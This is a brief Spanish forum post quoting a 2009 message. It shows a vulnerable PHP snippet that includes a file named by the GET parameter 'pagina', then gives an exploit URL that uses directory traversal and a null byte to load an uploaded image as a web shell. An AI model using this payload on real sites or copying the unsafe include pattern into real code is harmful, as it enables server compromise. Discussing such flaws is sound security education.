Cita de: WHK en 26 Agosto 2009, 22:25 PM
he visto casos que hacen esto:Código (php) [Seleccionar]<?php
if($_GET['pagina'])
include('inclusiones/'.$_GET['pagina'].'.php');
?>
y no es chiste xD
index.php?pagina=../../imagenes/shell_lfi.jpg%00
pnwd XD